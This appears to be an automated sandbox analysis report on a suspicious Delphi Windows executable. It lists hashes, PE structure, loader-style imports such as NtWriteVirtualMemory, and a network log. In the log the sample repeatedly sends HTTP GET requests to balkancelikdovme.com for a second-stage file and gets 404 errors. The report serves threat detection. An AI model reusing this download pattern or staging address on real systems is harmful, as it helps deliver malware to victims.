                  • Win32 Executable (generic) a (10002005/4) 99.66%
                  • Win32 Executable Delphi generic (14689/80) 0.15%
                  • Windows Screen Saver (13104/52) 0.13%
                  • Win16/32 Executable Delphi generic (2074/23) 0.02%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  File name:r096teIe1H.exe
                  File size:1'053'184 bytes
                  MD5:b1e794e29881f56a4e9afa213d7c622d
                  SHA1:7f5991e1e24a29eff5fad62b33e05fcff2eb0988
                  SHA256:53e4ef9bed0e669de506d72e339fa3f36534aef9d10519491d0f0acea27b8841
                  SHA512:bd9c2dd293c9d0282dcd1d53edc3919ce2d92fe43f451cc014324ce21c7f0fa14ee59099342adfb11e742eb7e7937f5eddef6ecc43bac129e42a62126de90276
                  SSDEEP:24576:p9PSlSUTC5lG8Zj4BQG/AWgbPmEqE5pgixE7p:p9PUZT27j4aGoTlnpg
                  TLSH:5C25C022B1A88473F1E71E34F98E6394981F7D211F74788366D27D8EBA76541B62C383
                  File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                  Icon Hash:71f9919286b2a1a5
                  Entrypoint:0x460464
                  Entrypoint Section:CODE
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                  DLL Characteristics:
                  Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:eeb6f210c31e51d5b63be371278c03a3
                  Instruction
                  push ebp
                  mov ebp, esp
                  add esp, FFFFFFF0h
                  mov eax, 004601C4h
                  call 00007F6B8C4FC2CDh
                  mov eax, dword ptr [004EBB1Ch]
                  mov eax, dword ptr [eax]
                  call 00007F6B8C547BD5h
                  mov ecx, dword ptr [004EBC14h]
                  mov eax, dword ptr [004EBB1Ch]
                  mov eax, dword ptr [eax]
                  mov edx, dword ptr [0045FF04h]
                  call 00007F6B8C547BD5h
                  mov eax, dword ptr [004EBB1Ch]
                  mov eax, dword ptr [eax]
                  call 00007F6B8C547C49h
                  call 00007F6B8C4F9EF0h
                  lea eax, dword ptr [eax+00h]
                  add byte ptr [eax], al
                  Name | Virtual Address | Virtual Size | Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0xed000 | 0x232c | .idata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf9000 | 0xd600 | .rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xf2000 | 0x6c0c | .reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_TLS | 0xf1000 | 0x18 | .rdata
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                  Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                  CODE | 0x1000 | 0x5f4ac | 0x5f600 | False | 0.5237011590760158 | data | 6.539693084964852 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  DATA | 0x61000 | 0x8acb4 | 0x8ae00 | False | 0.6662107617011701 | data | 7.528235634086147 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  BSS | 0xec000 | 0xd15 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .idata | 0xed000 | 0x232c | 0x2400 | False | 0.3628472222222222 | data | 4.971041857999194 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .tls | 0xf0000 | 0x10 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rdata | 0xf1000 | 0x18 | 0x200 | False | 0.05078125 | data | 0.15842690200323517 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                  .reloc | 0xf2000 | 0x6c0c | 0x6e00 | False | 0.6440340909090909 | data | 6.682368392261621 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                  .rsrc | 0xf9000 | 0xd600 | 0xd600 | False | 0.1875 | data | 3.9582855006976745 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                  Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                  RT_CURSOR | 0xf9e98 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" |  |  | 0.38636363636363635
                  RT_CURSOR | 0xf9fcc | 0x134 | data |  |  | 0.4642857142857143
                  RT_CURSOR | 0xfa100 | 0x134 | data |  |  | 0.4805194805194805
                  RT_CURSOR | 0xfa234 | 0x134 | data |  |  | 0.38311688311688313
                  RT_CURSOR | 0xfa368 | 0x134 | data |  |  | 0.36038961038961037
                  RT_CURSOR | 0xfa49c | 0x134 | data |  |  | 0.4090909090909091
                  RT_CURSOR | 0xfa5d0 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" |  |  | 0.4967532467532468
                  RT_BITMAP | 0xfa704 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 |  |  | 0.43103448275862066
                  RT_BITMAP | 0xfa8d4 | 0x1e4 | Device independent bitmap graphic, 36 x 19 x 4, image size 380 |  |  | 0.46487603305785125
                  RT_BITMAP | 0xfaab8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 |  |  | 0.43103448275862066
                  RT_BITMAP | 0xfac88 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 |  |  | 0.39870689655172414
                  RT_BITMAP | 0xfae58 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 |  |  | 0.4245689655172414
                  RT_BITMAP | 0xfb028 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 |  |  | 0.5021551724137931
                  RT_BITMAP | 0xfb1f8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 |  |  | 0.5064655172413793
                  RT_BITMAP | 0xfb3c8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 |  |  | 0.39655172413793105
                  RT_BITMAP | 0xfb598 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 |  |  | 0.5344827586206896
                  RT_BITMAP | 0xfb768 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 |  |  | 0.39655172413793105
                  RT_BITMAP | 0xfb938 | 0xc0 | Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors |  |  | 0.5208333333333334
                  RT_BITMAP | 0xfb9f8 | 0xe0 | Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors |  |  | 0.42857142857142855
                  RT_BITMAP | 0xfbad8 | 0xe0 | Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors |  |  | 0.4955357142857143
                  RT_BITMAP | 0xfbbb8 | 0xe0 | Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors |  |  | 0.38392857142857145
                  RT_BITMAP | 0xfbc98 | 0xc0 | Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors |  |  | 0.4947916666666667
                  RT_BITMAP | 0xfbd58 | 0xc0 | Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors |  |  | 0.484375
                  RT_BITMAP | 0xfbe18 | 0xe0 | Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors |  |  | 0.42410714285714285
                  RT_BITMAP | 0xfbef8 | 0xc0 | Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors |  |  | 0.5104166666666666
                  RT_BITMAP | 0xfbfb8 | 0xe0 | Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors |  |  | 0.5
                  RT_BITMAP | 0xfc098 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | English | United States | 0.4870689655172414
                  RT_BITMAP | 0xfc180 | 0xc0 | Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors |  |  | 0.4895833333333333
                  RT_BITMAP | 0xfc240 | 0xe0 | Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors |  |  | 0.3794642857142857
                  RT_ICON | 0xfc320 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors |  |  | 0.2355595667870036
                  RT_ICON | 0xfcbc8 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors |  |  | 0.2805299539170507
                  RT_ICON | 0xfd290 | 0x3a48 | Device independent bitmap graphic, 60 x 120 x 32, image size 14880 |  |  | 0.052815013404825736
                  RT_ICON | 0x100cd8 | 0x1a68 | Device independent bitmap graphic, 40 x 80 x 32, image size 6720 |  |  | 0.09186390532544379
                  RT_ICON | 0x102740 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 |  |  | 0.20081967213114754
                  RT_ICON | 0x1030c8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 |  |  | 0.3182624113475177
                  RT_DIALOG | 0x103530 | 0x52 | data |  |  | 0.7682926829268293
                  RT_STRING | 0x103584 | 0x308 | data |  |  | 0.43943298969072164
                  RT_STRING | 0x10388c | 0x1f0 | data |  |  | 0.4213709677419355
                  RT_STRING | 0x103a7c | 0x1c0 | data |  |  | 0.44419642857142855
                  RT_STRING | 0x103c3c | 0xdc | data |  |  | 0.6
                  RT_STRING | 0x103d18 | 0x2f4 | data |  |  | 0.4497354497354497
                  RT_STRING | 0x10400c | 0xdc | data |  |  | 0.5863636363636363
                  RT_STRING | 0x1040e8 | 0x10c | data |  |  | 0.5746268656716418
                  RT_STRING | 0x1041f4 | 0x33c | data |  |  | 0.4311594202898551
                  RT_STRING | 0x104530 | 0x3d4 | data |  |  | 0.3683673469387755
                  RT_STRING | 0x104904 | 0x3a4 | data |  |  | 0.34763948497854075
                  RT_STRING | 0x104ca8 | 0x3e8 | data |  |  | 0.384
                  RT_STRING | 0x105090 | 0xf4 | data |  |  | 0.47540983606557374
                  RT_STRING | 0x105184 | 0xc4 | data |  |  | 0.5663265306122449
                  RT_STRING | 0x105248 | 0x2c0 | data |  |  | 0.4446022727272727
                  RT_STRING | 0x105508 | 0x478 | data |  |  | 0.2928321678321678
                  RT_STRING | 0x105980 | 0x3ac | data |  |  | 0.37553191489361704
                  RT_STRING | 0x105d2c | 0x2d4 | data |  |  | 0.4046961325966851
                  RT_RCDATA | 0x106000 | 0x10 | data |  |  | 1.5
                  RT_RCDATA | 0x106010 | 0x368 | data |  |  | 0.6938073394495413
                  RT_RCDATA | 0x106378 | 0x129 | Delphi compiled form 'TForm1' |  |  | 0.7878787878787878
                  RT_GROUP_CURSOR | 0x1064a4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 |  |  | 1.25
                  RT_GROUP_CURSOR | 0x1064b8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 |  |  | 1.25
                  RT_GROUP_CURSOR | 0x1064cc | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 |  |  | 1.3
                  RT_GROUP_CURSOR | 0x1064e0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 |  |  | 1.3
                  RT_GROUP_CURSOR | 0x1064f4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 |  |  | 1.3
                  RT_GROUP_CURSOR | 0x106508 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 |  |  | 1.3
                  RT_GROUP_CURSOR | 0x10651c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 |  |  | 1.3
                  RT_GROUP_ICON | 0x106530 | 0x5a | data |  |  | 0.8222222222222222
                  DLL | Import
                  kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                  user32.dll | GetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                  advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
                  oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
                  kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                  advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
                  kernel32.dll | lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryExA, LoadLibraryW, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetComputerNameA, GetCPInfo, GetACP, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, ExitProcess, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                  version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                  gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
                  user32.dll | CreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsMenu, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                  kernel32.dll | Sleep
                  oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                  ole32.dll | CoTaskMemFree, ProgIDFromCLSID, StringFromCLSID, CoCreateInstance, CoUninitialize, CoInitialize, IsEqualGUID
                  oleaut32.dll | GetErrorInfo, GetActiveObject, SysFreeString
                  comctl32.dll | ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                  ntdll | NtWriteVirtualMemory, NtProtectVirtualMemory
                  uRL | TelnetProtocolHandler
                  ntdll | NtQueryInformationFile, NtOpenFile, NtClose, NtReadFile
                  ntdll | RtlDosPathNameToNtPathName_U
                  Language of compilation system | Country where language is spoken | Map
                  English | United States |
                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Aug 23, 2023 20:15:38.598284960 CEST | 56452 | 53 | 192.168.2.3 | 8.8.8.8
                  Aug 23, 2023 20:15:38.636898041 CEST | 53 | 56452 | 8.8.8.8 | 192.168.2.3
                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                  Aug 23, 2023 20:15:38.598284960 CEST | 192.168.2.3 | 8.8.8.8 | 0x8271 | Standard query (0) | balkancelikdovme.com | A (IP address) | IN (0x0001) | false
                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                  Aug 23, 2023 20:15:38.636898041 CEST | 8.8.8.8 | 192.168.2.3 | 0x8271 | No error (0) | balkancelikdovme.com |  | 185.181.116.217 | A (IP address) | IN (0x0001) | false
                  • balkancelikdovme.com
                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  0 | 192.168.2.3 | 49722 | 185.181.116.217 | 80 | C:\Users\user\Desktop\r096teIe1H.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Aug 23, 2023 20:15:38.685477972 CEST | 0 | OUT | GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1
                  Connection: Keep-Alive
                  Accept: */*
                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                  Host: balkancelikdovme.com
                  Aug 23, 2023 20:15:38.718023062 CEST | 1 | IN | HTTP/1.1 404 Not Found
                  Connection: Keep-Alive
                  Keep-Alive: timeout=5, max=100
                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                  pragma: no-cache
                  content-type: text/html
                  content-length: 708
                  date: Wed, 23 Aug 2023 18:15:38 GMT
                  vary: User-Agent
                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
                  Aug 23, 2023 20:15:48.442692995 CEST | 43 | OUT | GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1
                  Connection: Keep-Alive
                  Accept: */*
                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                  Host: balkancelikdovme.com
                  Aug 23, 2023 20:15:48.475735903 CEST | 44 | IN | HTTP/1.1 404 Not Found
                  Connection: Keep-Alive
                  Keep-Alive: timeout=5, max=100
                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                  pragma: no-cache
                  content-type: text/html
                  content-length: 708
                  date: Wed, 23 Aug 2023 18:15:48 GMT
                  vary: User-Agent
                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
                  Aug 23, 2023 20:15:48.715687037 CEST 45 IN HTTP/1.1 404 Not Found
                  Connection: Keep-Alive
                  Keep-Alive: timeout=5, max=100
                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                  pragma: no-cache
                  content-type: text/html
                  content-length: 708
                  date: Wed, 23 Aug 2023 18:15:48 GMT
                  vary: User-Agent
                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
                  Aug 23, 2023 20:15:58.453622103 CEST 1875 OUT GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1
                  Connection: Keep-Alive
                  Accept: */*
                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                  Host: balkancelikdovme.com
                  Aug 23, 2023 20:15:58.486627102 CEST 1876 IN HTTP/1.1 404 Not Found
                  Connection: Keep-Alive
                  Keep-Alive: timeout=5, max=100
                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                  pragma: no-cache
                  content-type: text/html
                  content-length: 708
                  date: Wed, 23 Aug 2023 18:15:58 GMT
                  vary: User-Agent
                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
                  Aug 23, 2023 20:16:08.409265995 CEST 1876 OUT GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1
                  Connection: Keep-Alive
                  Accept: */*
                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                  Host: balkancelikdovme.com
                  Aug 23, 2023 20:16:08.442828894 CEST 1877 IN HTTP/1.1 404 Not Found
                  Connection: Keep-Alive
                  Keep-Alive: timeout=5, max=100
                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                  pragma: no-cache
                  content-type: text/html
                  content-length: 708
                  date: Wed, 23 Aug 2023 18:16:08 GMT
                  vary: User-Agent
                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
                  Aug 23, 2023 20:16:18.423207998 CEST 1896 OUT GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1
                  Connection: Keep-Alive
                  Accept: */*
                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                  Host: balkancelikdovme.com
                  Aug 23, 2023 20:16:18.456218004 CEST 1897 IN HTTP/1.1 404 Not Found
                  Connection: Keep-Alive
                  Keep-Alive: timeout=5, max=100
                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                  pragma: no-cache
                  content-type: text/html
                  content-length: 708
                  date: Wed, 23 Aug 2023 18:16:18 GMT
                  vary: User-Agent
                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
                  Aug 23, 2023 20:16:28.441639900 CEST 2247 OUT GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1
                  Connection: Keep-Alive
                  Accept: */*
                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                  Host: balkancelikdovme.com
                  Aug 23, 2023 20:16:28.474505901 CEST 2249 IN HTTP/1.1 404 Not Found
                  Connection: Keep-Alive
                  Keep-Alive: timeout=5, max=100
                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                  pragma: no-cache
                  content-type: text/html
                  content-length: 708
                  date: Wed, 23 Aug 2023 18:16:28 GMT
                  vary: User-Agent
